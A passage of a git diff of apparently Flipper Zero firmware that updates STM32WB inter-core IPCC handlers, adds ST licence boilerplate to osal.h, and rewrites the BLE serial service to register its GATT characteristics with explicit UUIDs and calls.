HW_IPCC_MM_FreeBufHandler(); + } else if(HW_IPCC_TX_PENDING(HW_IPCC_HCI_ACL_DATA_CHANNEL)) { + HW_IPCC_BLE_AclDataEvtHandler(); + } +-} + +-void HW_IPCC_Enable() { ++ return; ++} ++/****************************************************************************** ++ * GENERAL ++ ******************************************************************************/ ++void HW_IPCC_Enable(void) { + /** + * Such as IPCC IP available to the CPU2, it is required to keep the IPCC clock running + when FUS is running on CPU2 and CPU1 enters deep sleep mode +@@ -69,9 +177,11 @@ void HW_IPCC_Enable() { + __SEV(); /* Set the internal event flag and send an event to the CPU2 */ + __WFE(); /* Clear the internal event flag */ + LL_PWR_EnableBootC2(); ++ ++ return; + } + +-void HW_IPCC_Init() { ++void HW_IPCC_Init(void) { + LL_C1_IPCC_EnableIT_RXO(IPCC); + LL_C1_IPCC_EnableIT_TXF(IPCC); + +@@ -79,62 +189,366 @@ void HW_IPCC_Init() { + NVIC_EnableIRQ(IPCC_C1_RX_IRQn); + NVIC_SetPriority(IPCC_C1_TX_IRQn, NVIC_EncodePriority(NVIC_GetPriorityGrouping(), 6, 0)); + NVIC_EnableIRQ(IPCC_C1_TX_IRQn); ++ ++ return; + } + +-void HW_IPCC_BLE_Init() { ++/****************************************************************************** ++ * BLE ++ ******************************************************************************/ ++void HW_IPCC_BLE_Init(void) { + LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_BLE_EVENT_CHANNEL); ++ ++ return; + } + +-void HW_IPCC_BLE_SendCmd() { ++void HW_IPCC_BLE_SendCmd(void) { + LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_BLE_CMD_CHANNEL); ++ ++ return; + } + +-static void HW_IPCC_BLE_EvtHandler() { ++static void HW_IPCC_BLE_EvtHandler(void) { + HW_IPCC_BLE_RxEvtNot(); + + LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_BLE_EVENT_CHANNEL); ++ ++ return; + } + +-void HW_IPCC_BLE_SendAclData() { ++void HW_IPCC_BLE_SendAclData(void) { + LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); + LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); ++ ++ return; + } + +-static void HW_IPCC_BLE_AclDataEvtHandler() { ++static void HW_IPCC_BLE_AclDataEvtHandler(void) { + LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); + + HW_IPCC_BLE_AclDataAckNot(); ++ ++ return; + } + +-void HW_IPCC_SYS_Init() { ++__weak void HW_IPCC_BLE_AclDataAckNot(void){}; ++__weak void HW_IPCC_BLE_RxEvtNot(void){}; ++ ++/****************************************************************************** ++ * SYSTEM ++ ******************************************************************************/ ++void HW_IPCC_SYS_Init(void) { + LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_SYSTEM_EVENT_CHANNEL); ++ ++ return; + } + +-void HW_IPCC_SYS_SendCmd() { ++void HW_IPCC_SYS_SendCmd(void) { + LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); ++ LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); + +- FuriHalCortexTimer timer = furi_hal_cortex_timer_get(33000000); +- +- while(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { +- furi_check(!furi_hal_cortex_timer_is_expired(timer), "HW_IPCC_SYS_SendCmd timeout"); +- } +- +- HW_IPCC_SYS_CmdEvtHandler(); ++ return; + } + +-static void HW_IPCC_SYS_CmdEvtHandler() { ++static void HW_IPCC_SYS_CmdEvtHandler(void) { + LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); + + HW_IPCC_SYS_CmdEvtNot(); ++ ++ return; + } + +-static void HW_IPCC_SYS_EvtHandler() { ++static void HW_IPCC_SYS_EvtHandler(void) { + HW_IPCC_SYS_EvtNot(); + + LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_SYSTEM_EVENT_CHANNEL); ++ ++ return; ++} ++ ++__weak void HW_IPCC_SYS_CmdEvtNot(void){}; ++__weak void HW_IPCC_SYS_EvtNot(void){}; ++ ++/****************************************************************************** ++ * MAC 802.15.4 ++ ******************************************************************************/ ++#ifdef MAC_802_15_4_WB ++void HW_IPCC_MAC_802_15_4_Init(void) { ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_MAC_802_15_4_SendCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); ++ LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_MAC_802_15_4_SendAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); ++ ++ return; ++} ++ ++static void HW_IPCC_MAC_802_15_4_CmdEvtHandler(void) { ++ LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); ++ ++ HW_IPCC_MAC_802_15_4_CmdEvtNot(); ++ ++ return; ++} ++ ++static void HW_IPCC_MAC_802_15_4_NotEvtHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); ++ ++ HW_IPCC_MAC_802_15_4_EvtNot(); ++ ++ return; ++} ++__weak void HW_IPCC_MAC_802_15_4_CmdEvtNot(void){}; ++__weak void HW_IPCC_MAC_802_15_4_EvtNot(void){}; ++#endif ++ ++/****************************************************************************** ++ * THREAD ++ ******************************************************************************/ ++#ifdef THREAD_WB ++void HW_IPCC_THREAD_Init(void) { ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_OT_SendCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); ++ LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_CLI_SendCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_THREAD_CLI_CMD_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_THREAD_SendAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_THREAD_CliSendAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); ++ ++ return; ++} ++ ++static void HW_IPCC_OT_CmdEvtHandler(void) { ++ LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); ++ ++ HW_IPCC_OT_CmdEvtNot(); ++ ++ return; + } + +-void HW_IPCC_MM_SendFreeBuf(void (*cb)()) { ++static void HW_IPCC_THREAD_NotEvtHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); ++ ++ HW_IPCC_THREAD_EvtNot(); ++ ++ return; ++} ++ ++static void HW_IPCC_THREAD_CliNotEvtHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); ++ ++ HW_IPCC_THREAD_CliEvtNot(); ++ ++ return; ++} ++ ++__weak void HW_IPCC_OT_CmdEvtNot(void){}; ++__weak void HW_IPCC_CLI_CmdEvtNot(void){}; ++__weak void HW_IPCC_THREAD_EvtNot(void){}; ++ ++#endif /* THREAD_WB */ ++ ++/****************************************************************************** ++ * LLD TESTS ++ ******************************************************************************/ ++#ifdef LLD_TESTS_WB ++void HW_IPCC_LLDTESTS_Init(void) { ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); ++ return; ++} ++ ++void HW_IPCC_LLDTESTS_SendCliCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLDTESTS_CLI_CMD_CHANNEL); ++ return; ++} ++ ++static void HW_IPCC_LLDTESTS_ReceiveCliRspHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); ++ HW_IPCC_LLDTESTS_ReceiveCliRsp(); ++ return; ++} ++ ++void HW_IPCC_LLDTESTS_SendCliRspAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); ++ return; ++} ++ ++static void HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); ++ HW_IPCC_LLDTESTS_ReceiveM0Cmd(); ++ return; ++} ++ ++void HW_IPCC_LLDTESTS_SendM0CmdAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); ++ return; ++} ++__weak void HW_IPCC_LLDTESTS_ReceiveCliRsp(void){}; ++__weak void HW_IPCC_LLDTESTS_ReceiveM0Cmd(void){}; ++#endif /* LLD_TESTS_WB */ ++ ++/****************************************************************************** ++ * LLD BLE ++ ******************************************************************************/ ++#ifdef LLD_BLE_WB ++void HW_IPCC_LLD_BLE_Init(void) { ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL); ++ return; ++} ++ ++void HW_IPCC_LLD_BLE_SendCliCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CLI_CMD_CHANNEL); ++ return; ++} ++ ++/*static void HW_IPCC_LLD_BLE_ReceiveCliRspHandler( void ) ++{ ++ LL_C1_IPCC_DisableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL ); ++ HW_IPCC_LLD_BLE_ReceiveCliRsp(); ++ return; ++}*/ ++ ++void HW_IPCC_LLD_BLE_SendCliRspAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL); ++ return; ++} ++ ++static void HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(void) { ++ //LL_C1_IPCC_DisableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL ); ++ HW_IPCC_LLD_BLE_ReceiveM0Cmd(); ++ return; ++} ++ ++void HW_IPCC_LLD_BLE_SendM0CmdAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL); ++ //LL_C1_IPCC_EnableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL ); ++ return; ++} ++__weak void HW_IPCC_LLD_BLE_ReceiveCliRsp(void){}; ++__weak void HW_IPCC_LLD_BLE_ReceiveM0Cmd(void){}; ++ ++/* Transparent Mode */ ++void HW_IPCC_LLD_BLE_SendCmd(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CMD_CHANNEL); ++ return; ++} ++ ++static void HW_IPCC_LLD_BLE_ReceiveRspHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); ++ HW_IPCC_LLD_BLE_ReceiveRsp(); ++ return; ++} ++ ++void HW_IPCC_LLD_BLE_SendRspAck(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); ++ return; ++} ++ ++#endif /* LLD_BLE_WB */ ++ ++/****************************************************************************** ++ * ZIGBEE ++ ******************************************************************************/ ++#ifdef ZIGBEE_WB ++void HW_IPCC_ZIGBEE_Init(void) { ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_ZIGBEE_SendM4RequestToM0(void) { ++ LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); ++ LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); ++ ++ return; ++} ++ ++void HW_IPCC_ZIGBEE_SendM4AckToM0Notify(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); ++ ++ return; ++} ++ ++static void HW_IPCC_ZIGBEE_CmdEvtHandler(void) { ++ LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); ++ ++ HW_IPCC_ZIGBEE_RecvAppliAckFromM0(); ++ ++ return; ++} ++ ++static void HW_IPCC_ZIGBEE_StackNotifEvtHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); ++ ++ HW_IPCC_ZIGBEE_RecvM0NotifyToM4(); ++ ++ return; ++} ++ ++static void HW_IPCC_ZIGBEE_StackM0RequestHandler(void) { ++ LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); ++ ++ HW_IPCC_ZIGBEE_RecvM0RequestToM4(); ++ ++ return; ++} ++ ++void HW_IPCC_ZIGBEE_SendM4AckToM0Request(void) { ++ LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); ++ LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); ++ ++ return; ++} ++ ++__weak void HW_IPCC_ZIGBEE_RecvAppliAckFromM0(void){}; ++__weak void HW_IPCC_ZIGBEE_RecvM0NotifyToM4(void){}; ++__weak void HW_IPCC_ZIGBEE_RecvM0RequestToM4(void){}; ++#endif /* ZIGBEE_WB */ ++ ++/****************************************************************************** ++ * MEMORY MANAGER ++ ******************************************************************************/ ++void HW_IPCC_MM_SendFreeBuf(void (*cb)(void)) { + if(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL)) { + FreeBufCb = cb; + LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); +@@ -143,22 +557,37 @@ void HW_IPCC_MM_SendFreeBuf(void (*cb)()) { + + LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); + } ++ ++ return; + } + +-static void HW_IPCC_MM_FreeBufHandler() { ++static void HW_IPCC_MM_FreeBufHandler(void) { + LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); + + FreeBufCb(); + + LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); ++ ++ return; + } + +-void HW_IPCC_TRACES_Init() { ++/****************************************************************************** ++ * TRACES ++ ******************************************************************************/ ++void HW_IPCC_TRACES_Init(void) { + LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_TRACES_CHANNEL); ++ ++ return; + } + +-static void HW_IPCC_TRACES_EvtHandler() { ++static void HW_IPCC_TRACES_EvtHandler(void) { + HW_IPCC_TRACES_EvtNot(); + + LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_TRACES_CHANNEL); ++ ++ return; + } ++ ++__weak void HW_IPCC_TRACES_EvtNot(void){}; ++ ++/******************* (C) COPYRIGHT 2019 STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/osal.h b/firmware/targets/f7/ble_glue/osal.h +index 0cde06179..e5e0c4f68 100644 +--- a/firmware/targets/f7/ble_glue/osal.h ++++ b/firmware/targets/f7/ble_glue/osal.h +@@ -1,4 +1,25 @@ +-#pragma once ++/***************************************************************************** ++ * @file osal.h ++ * @author MDG ++ * @brief This header file defines the OS abstraction layer used by ++ * the BLE stack. OSAL defines the set of functions which needs to be ++ * ported to target operating system and target platform. ++ * Actually, only memset, memcpy and memcmp wrappers are defined. ++ ***************************************************************************** ++ * @attention ++ * ++ * Copyright (c) 2018-2022 STMicroelectronics. ++ * All rights reserved. ++ * ++ * This software is licensed under terms that can be found in the LICENSE file ++ * in the root directory of this software component. ++ * If no LICENSE file comes with this software, it is provided AS-IS. ++ * ++ ***************************************************************************** ++ */ ++ ++#ifndef OSAL_H__ ++#define OSAL_H__ + + /** + * This function copies size number of bytes from a +@@ -38,3 +59,5 @@ extern void* Osal_MemSet(void* ptr, int value, unsigned int size); + * @return 0 if the two buffers are equal, 1 otherwise + */ + extern int Osal_MemCmp(const void* s1, const void* s2, unsigned int size); ++ ++#endif /* OSAL_H__ */ +diff --git a/firmware/targets/f7/ble_glue/services/serial_service.c b/firmware/targets/f7/ble_glue/serial_service.c +similarity index 57% +rename from firmware/targets/f7/ble_glue/services/serial_service.c +rename to firmware/targets/f7/ble_glue/serial_service.c +index 0db25b3d3..c6421dc28 100644 +--- a/firmware/targets/f7/ble_glue/services/serial_service.c ++++ b/firmware/targets/f7/ble_glue/serial_service.c +@@ -1,67 +1,17 @@ + #include "serial_service.h" + #include "app_common.h" + #include +-#include "gatt_char.h" + + #include + +-#include "serial_service_uuid.inc" +- + #define TAG "BtSerialSvc" + +-typedef enum { +- SerialSvcGattCharacteristicRx = 0, +- SerialSvcGattCharacteristicTx, +- SerialSvcGattCharacteristicFlowCtrl, +- SerialSvcGattCharacteristicStatus, +- SerialSvcGattCharacteristicCount, +-} SerialSvcGattCharacteristicId; +- +-static const FlipperGattCharacteristicParams serial_svc_chars[SerialSvcGattCharacteristicCount] = { +- [SerialSvcGattCharacteristicRx] = +- {.name = "RX", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = SERIAL_SVC_DATA_LEN_MAX, +- .uuid.Char_UUID_128 = SERIAL_SVC_RX_CHAR_UUID, +- .uuid_type = UUID_TYPE_128, +- .char_properties = CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE | CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, +- .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, +- .is_variable = CHAR_VALUE_LEN_VARIABLE}, +- [SerialSvcGattCharacteristicTx] = +- {.name = "TX", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = SERIAL_SVC_DATA_LEN_MAX, +- .uuid.Char_UUID_128 = SERIAL_SVC_TX_CHAR_UUID, +- .uuid_type = UUID_TYPE_128, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_INDICATE, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_VARIABLE}, +- [SerialSvcGattCharacteristicFlowCtrl] = +- {.name = "Flow control", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = sizeof(uint32_t), +- .uuid.Char_UUID_128 = SERIAL_SVC_FLOW_CONTROL_UUID, +- .uuid_type = UUID_TYPE_128, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [SerialSvcGattCharacteristicStatus] = { +- .name = "RPC status", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = sizeof(SerialServiceRpcStatus), +- .uuid.Char_UUID_128 = SERIAL_SVC_RPC_STATUS_UUID, +- .uuid_type = UUID_TYPE_128, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE | CHAR_PROP_NOTIFY, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, +- .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}}; +- + typedef struct { + uint16_t svc_handle; +- FlipperGattCharacteristicInstance chars[SerialSvcGattCharacteristicCount]; ++ uint16_t rx_char_handle; ++ uint16_t tx_char_handle; ++ uint16_t flow_ctrl_char_handle; ++ uint16_t rpc_status_char_handle; + FuriMutex* buff_size_mtx; + uint32_t buff_size; + uint16_t bytes_ready_to_receive; +@@ -71,6 +21,17 @@ typedef struct { + + static SerialSvc* serial_svc = NULL; + ++static const uint8_t service_uuid[] = ++ {0x00, 0x00, 0xfe, 0x60, 0xcc, 0x7a, 0x48, 0x2a, 0x98, 0x4a, 0x7f, 0x2e, 0xd5, 0xb3, 0xe5, 0x8f}; ++static const uint8_t char_tx_uuid[] = ++ {0x00, 0x00, 0xfe, 0x61, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; ++static const uint8_t char_rx_uuid[] = ++ {0x00, 0x00, 0xfe, 0x62, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; ++static const uint8_t flow_ctrl_uuid[] = ++ {0x00, 0x00, 0xfe, 0x63, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; ++static const uint8_t rpc_status_uuid[] = ++ {0x00, 0x00, 0xfe, 0x64, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; ++ + static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { + SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; + hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); +@@ -79,14 +40,11 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { + if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { + if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { + attribute_modified = (aci_gatt_attribute_modified_event_rp0*)blecore_evt->data; +- if(attribute_modified->Attr_Handle == +- serial_svc->chars[SerialSvcGattCharacteristicRx].handle + 2) { ++ if(attribute_modified->Attr_Handle == serial_svc->rx_char_handle + 2) { + // Descriptor handle + ret = SVCCTL_EvtAckFlowEnable; + FURI_LOG_D(TAG, "RX descriptor event"); +- } else if( +- attribute_modified->Attr_Handle == +- serial_svc->chars[SerialSvcGattCharacteristicRx].handle + 1) { ++ } else if(attribute_modified->Attr_Handle == serial_svc->rx_char_handle + 1) { + FURI_LOG_D(TAG, "Received %d bytes", attribute_modified->Attr_Data_Length); + if(serial_svc->callback) { + furi_check( +@@ -112,9 +70,7 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { + furi_check(furi_mutex_release(serial_svc->buff_size_mtx) == FuriStatusOk); + } + ret = SVCCTL_EvtAckFlowEnable; +- } else if( +- attribute_modified->Attr_Handle == +- serial_svc->chars[SerialSvcGattCharacteristicStatus].handle + 1) { ++ } else if(attribute_modified->Attr_Handle == serial_svc->rpc_status_char_handle + 1) { + SerialServiceRpcStatus* rpc_status = + (SerialServiceRpcStatus*)attribute_modified->Attr_Data; + if(*rpc_status == SerialServiceRpcStatusNotActive) { +@@ -141,12 +97,18 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { + } + + static void serial_svc_update_rpc_char(SerialServiceRpcStatus status) { +- flipper_gatt_characteristic_update( +- serial_svc->svc_handle, &serial_svc->chars[SerialSvcGattCharacteristicStatus], &status); ++ tBleStatus ble_status = aci_gatt_update_char_value( ++ serial_svc->svc_handle, ++ serial_svc->rpc_status_char_handle, ++ 0, ++ sizeof(SerialServiceRpcStatus), ++ (uint8_t*)&status); ++ if(ble_status) { ++ FURI_LOG_E(TAG, "Failed to update RPC status char: %d", ble_status); ++ } + } + + void serial_svc_start() { +- UNUSED(serial_svc_chars); + tBleStatus status; + serial_svc = malloc(sizeof(SerialSvc)); + // Register event handler +@@ -154,17 +116,72 @@ void serial_svc_start() { + + // Add service + status = aci_gatt_add_service( +- UUID_TYPE_128, &service_uuid, PRIMARY_SERVICE, 12, &serial_svc->svc_handle); ++ UUID_TYPE_128, (Service_UUID_t*)service_uuid, PRIMARY_SERVICE, 12, &serial_svc->svc_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to add Serial service: %d", status); + } + +- // Add characteristics +- for(uint8_t i = 0; i < SerialSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_init( +- serial_svc->svc_handle, &serial_svc_chars[i], &serial_svc->chars[i]); ++ // Add RX characteristics ++ status = aci_gatt_add_char( ++ serial_svc->svc_handle, ++ UUID_TYPE_128, ++ (const Char_UUID_t*)char_rx_uuid, ++ SERIAL_SVC_DATA_LEN_MAX, ++ CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE | CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, ++ GATT_NOTIFY_ATTRIBUTE_WRITE, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &serial_svc->rx_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add RX characteristic: %d", status); + } + ++ // Add TX characteristic ++ status = aci_gatt_add_char( ++ serial_svc->svc_handle, ++ UUID_TYPE_128, ++ (const Char_UUID_t*)char_tx_uuid, ++ SERIAL_SVC_DATA_LEN_MAX, ++ CHAR_PROP_READ | CHAR_PROP_INDICATE, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &serial_svc->tx_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add TX characteristic: %d", status); ++ } ++ // Add Flow Control characteristic ++ status = aci_gatt_add_char( ++ serial_svc->svc_handle, ++ UUID_TYPE_128, ++ (const Char_UUID_t*)flow_ctrl_uuid, ++ sizeof(uint32_t), ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &serial_svc->flow_ctrl_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add Flow Control characteristic: %d", status); ++ } ++ // Add RPC status characteristic ++ status = aci_gatt_add_char( ++ serial_svc->svc_handle, ++ UUID_TYPE_128, ++ (const Char_UUID_t*)rpc_status_uuid, ++ sizeof(SerialServiceRpcStatus), ++ CHAR_PROP_READ | CHAR_PROP_WRITE | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, ++ GATT_NOTIFY_ATTRIBUTE_WRITE, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &serial_svc->rpc_status_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add RPC status characteristic: %d", status); ++ } + serial_svc_update_rpc_char(SerialServiceRpcStatusNotActive); + // Allocate buffer size mutex + serial_svc->buff_size_mtx = furi_mutex_alloc(FuriMutexTypeNormal); +@@ -179,12 